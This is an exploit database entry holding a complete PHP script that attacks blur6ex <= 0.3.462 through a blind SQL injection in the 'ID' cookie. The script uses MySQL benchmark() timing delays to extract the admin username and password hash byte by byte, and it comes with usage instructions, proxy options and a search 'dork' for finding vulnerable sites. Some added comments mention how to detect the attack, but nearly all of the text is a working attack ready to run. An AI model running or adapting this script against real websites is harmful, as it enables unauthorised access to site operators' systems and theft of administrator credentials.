blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploit

12 Jun 2006 00:00:00 — Reported by rgod — Type: zdt

======================================================================
blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploit
======================================================================





#!/usr/bin/php -q -d short_open_tag=on
<?
// Banner printed on every run: tool name, author, author's site and the search
// string ("dork") the author associates with this software.
echo "blur6ex <= 0.3.462 'ID' blind SQL injection / admin credentials disclosure\r\n",
     "by rgod [email protected]\r\n",
     "site: http://retrogod.altervista.org\r\n",
     "dork: \"powered by blur6ex\"\r\n\r\n";
/*
works regardless of php.ini settings
*/

// Without at least a host and a path there is nothing to do: print the usage
// text (the script's own name comes from $argv[0]) and stop.
if ($argc < 3) {
  echo "Usage: php {$argv[0]} host path OPTIONS\r\n",
       "host:      target server (ip/hostname)\r\n",
       "path:      path to blur6ex\r\n",
       "Options:\r\n",
       "   -T[prefix]   specify a table prefix different from default (no prefix)\r\n",
       "   -p[port]:    specify a port other than 80\r\n",
       "   -P[ip:port]: specify a proxy\r\n",
       "Example:\r\n",
       "php {$argv[0]} localhost /blur6ex/ \r\n",
       "php {$argv[0]} localhost /blur6ex/ -Tblur6ex_\r\n";
  exit;
}

/*
software site: http://www.blursoft.com/blur6ex/

vulnerable code in engine/shards/blog.php near lines 497-500:

...
case "proc_reply":
    // In order to set the permissions of the reply it's necessary to know what the parent is
    $permissionid = mysql_query("SELECT permission FROM blog WHERE ID=" . $_REQUEST['ID']);
...

the 'ID' argument is not sanitized before it is used in a SQL query;
the injection is blind...

this code shows how to use time delays through the MySQL benchmark() function;
the same technique can be used to ask questions of the target system
and retrieve data from tables

									      */
// Runtime settings for the rest of the script: suppress PHP's own diagnostics
// (connection failures are reported by the script itself), give every socket
// read a 5-second timeout, and lift the execution-time cap.
error_reporting(0);
ini_set('default_socket_timeout', 5);
ini_set('max_execution_time', 0);

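function quick_dump($string)
{
  // Renders $string as a two-part dump: a hex view (one space plus two lowercase
  // hex digits per byte) followed by a character view in which control bytes
  // (<= 0x20) and non-ASCII bytes (> 0x7e) are masked as '.'. Both views get a
  // "\r\n" break after every 15 bytes; an empty input yields just "\r\n".
  // Returns the hex view, "\r\n", then the character view.
  $chars = '';
  $hex = '';
  $columnCount = 0;
  $length = strlen($string);
  for ($pos = 0; $pos < $length; $pos++) {
    $byte = ord($string[$pos]);
    // Mask anything that would not print cleanly so the character view stays aligned.
    $chars .= ($byte <= 32 || $byte > 126) ? '  .' : '  ' . $string[$pos];
    // %02x zero-pads single-digit values, which the original did by hand.
    $hex .= sprintf(' %02x', $byte);
    $columnCount++;
    if ($columnCount == 15) {
      $columnCount = 0;
      $chars .= "\r\n";
      $hex .= "\r\n";
    }
  }
  return $hex . "\r\n" . $chars;
}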
// Shape check for the -P value ("ip:port"); the surrounding parentheses are the
// PCRE delimiters. Only digit counts are checked, so octet ranges are not validated.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  // Sends one raw HTTP request ($packet) either directly to $host:$port or via
  // the "ip:port" proxy in $proxy, and leaves the response in the global $html.
  // A failed connection or a malformed $proxy value is echoed and ends the script.
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    // Direct connection. No timeout argument is passed, so the ini value
    // default_socket_timeout (set to 5 s earlier in this file) applies.
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   // $proxy_regex only checks the ip:port shape, not the octet ranges.
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    // Direct: read line by line until the server closes the connection
    // (the request carries "Connection: Close").
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    // Proxy: read one byte at a time for as long as the stream has not hit EOF
    // or the blank line ending the headers (CRLF CRLF) has not yet been seen.
    // NOTE(review): eregi() was removed in PHP 7, so this branch only runs on
    // PHP 5-era interpreters.
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function my_encode($my_string)
{
  // Spells $my_string as a MySQL CHAR(...) literal, one decimal byte value per
  // character. An empty input yields "CHAR(" with no closing parenthesis, exactly
  // as the original implementation did.
  $length = strlen($my_string);
  $byteValues = array();
  for ($pos = 0; $pos < $length; $pos++) {
    $byteValues[] = ord($my_string[$pos]);
  }
  $literal = "CHAR(" . implode(",", $byteValues);
  if ($length > 0) {
    $literal .= ")";
  }
  return $literal;
}

// Positional arguments: target host and the web path of the blur6ex install.
$host=$argv[1];
$path=$argv[2];
// Defaults for the optional switches (-p port, -P proxy, -T table prefix).
$port=80;
$prefix="";
$proxy="";
for ($i=3; $i<$argc; $i++) {
  // A switch is recognised by its first two characters; the rest is its value.
  $temp = substr($argv[$i], 0, 2);
  if ($temp == "-p") {
    $port = str_replace("-p", "", $argv[$i]);
  } elseif ($temp == "-P") {
    $proxy = str_replace("-P", "", $argv[$i]);
  } elseif ($temp == "-T") {
    $prefix = str_replace("-T", "", $argv[$i]);
  }
}
// The path must begin and end with a slash.
if ($path[0] != '/' || $path[strlen($path)-1] != '/') {
  echo 'Error... check the path!';
  exit;
}
// Through a proxy the request line needs an absolute URL; directly, the path alone.
$p = ($proxy == '') ? $path : 'http://'.$host.':'.$port.$path;

// Stage 1: recover, one byte per position $j, the username belonging to the
// 'admin' permission group. The only feedback channel is time: the injected
// IF() runs benchmark() when the guessed byte $i matches, and a request that
// takes more than 5 whole seconds (time() has 1-second resolution) is counted
// as a hit. chr(0) marks end-of-string. Seen from the server this is a burst
// of proc_reply requests, one per candidate value, with a very slow query
// behind each hit -- the shape a slow-query log or a rate limit would catch.
$admin="";
$j=1;
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
  $starttime=time();
  echo "starttime -> ".$starttime."\r\n";
  // $prefix is the optional -T table prefix; 'admin' is written as CHAR(...)
  // to avoid quote characters, and spaces become /**/ on the next line.
  $sql="99999 UNION SELECT IF((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(50000000,CHAR(0)),0) FROM ".$prefix."permissiongroups WHERE PGroup=CHAR(97,100,109,105,110)";
  $sql=str_replace(" ","/**/",$sql);
  $sql=urlencode($sql);
  // The payload is sent in the ID cookie, which the vulnerable handler reads
  // through $_REQUEST. Default access logs generally omit cookies, so detection
  // needs the cookie value or the request duration, not just the URL.
  $packet ="GET ".$p."index.php?shard=blog&action=proc_reply HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Cookie: ID=".$sql.";\r\n"; // payload travels in the cookie, not the query string -- log this
  $packet.="Connection: Close\r\n\r\n";
  echo quick_dump($packet)."\r\n";   // hex/char dump of the outgoing request
  sendpacketii($packet);              // fills the global $html
  $endtime=time();
  echo "endtime -> ".$endtime."\r\n";
  $difftime=$endtime - $starttime;
  echo "difftime -> ".$difftime."\r\n";
  // Hit: keep the byte, show progress, pause 2 s, move on to the next position.
  if ($difftime > 5) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;}
  // No candidate matched, or the response contains "doesn't exist" (presumably
  // a missing-table error, i.e. the wrong -T prefix). NOTE(review): eregi() was
  // removed in PHP 7.
  if (($i==255) | (eregi("doesn't exist",$html))) {
  //debug
  echo $html."\r\n";
  die("Exploit failed...maybe wrong table prefix");
  }
}
$j++;
}
// Drop the chr(0) terminator that ended the loop.
$admin=str_replace(chr(0),"",$admin);
echo "admin -> ".$admin."\r\n";

// Stage 2: the same timing oracle, now reading the 'password' column of the
// users row whose username equals the name found in stage 1 (my_encode() spells
// it as CHAR(...)). Whatever the column holds is read back byte by byte; the
// final report labels it "password (sha1)", which suggests a stored hash rather
// than cleartext. The request pattern on the server side is the same as above.
$password="";
$j=1;
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
  $starttime=time();
  echo "starttime -> ".$starttime."\r\n";
  $sql="99999 UNION SELECT IF((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1, benchmark(50000000,CHAR(0)),0) FROM ".$prefix."users WHERE username=".my_encode($admin);
  $sql=str_replace(" ","/**/",$sql);
  $sql=urlencode($sql);
  $packet ="GET ".$p."index.php?shard=blog&action=proc_reply HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Cookie: ID=".$sql.";\r\n"; // payload in the ID cookie, as in stage 1
  $packet.="Connection: Close\r\n\r\n";
  echo quick_dump($packet)."\r\n";
  sendpacketii($packet);
  $endtime=time();
  echo "endtime -> ".$endtime."\r\n";
  $difftime=$endtime - $starttime;
  echo "difftime -> ".$difftime."\r\n";
  // Hit: keep the byte, show progress, pause 2 s, move on to the next position.
  if ($difftime > 5) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
  // No candidate matched at this position: there is no users row for $admin.
  if ($i==255) {die("Exploit failed...we have an admin user in 'permissiongroups' table, but for some reason there is not a '".$admin."' user in 'users' one...");}
}
$j++;
}
//if you are here... both loops ended on a chr(0) terminator. Note that $password
// is printed with its terminator still attached (no str_replace as for $admin).
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (sha1)-> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
?>



#  0day.today [2018-04-14]  #
